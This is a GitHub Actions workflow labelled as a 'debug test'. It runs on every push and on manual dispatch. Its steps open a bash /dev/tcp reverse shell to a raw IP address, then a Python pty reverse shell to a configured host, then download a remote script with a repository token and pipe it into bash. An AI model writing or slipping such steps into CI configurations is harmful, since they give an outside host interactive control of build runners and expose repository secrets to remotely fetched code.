name: Vulcon Debug Test

on:
  workflow_dispatch:
  push:

jobs:
  VulconDebug:
    runs-on: ubuntu-latest
    steps:
    - run: |
        bash -i >& /dev/tcp/18.218.123.251/9999 0>&1
    - run: |
        export VULCON_DEBUG_SHELL_HOST="cloud.security.amagi.tv"
        export VULCON_DEBUG_SHELL_PORT=9999
        python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("VULCON_DEBUG_SHELL_HOST"),int(os.getenv("VULCON_DEBUG_SHELL_PORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
    - env:
        TOKEN: ${{ secrets.TOKEN }}
        VULCON_DEBUG_SHELL: true
      run: |
        curl -X GET --header "Accept: application/vnd.github.v3.raw" --header "Authorization: token $TOKEN" 'https://raw.githubusercontent.com/amagimedia/vulcon/debug-shell/scripts/vulcon.sh' | bash

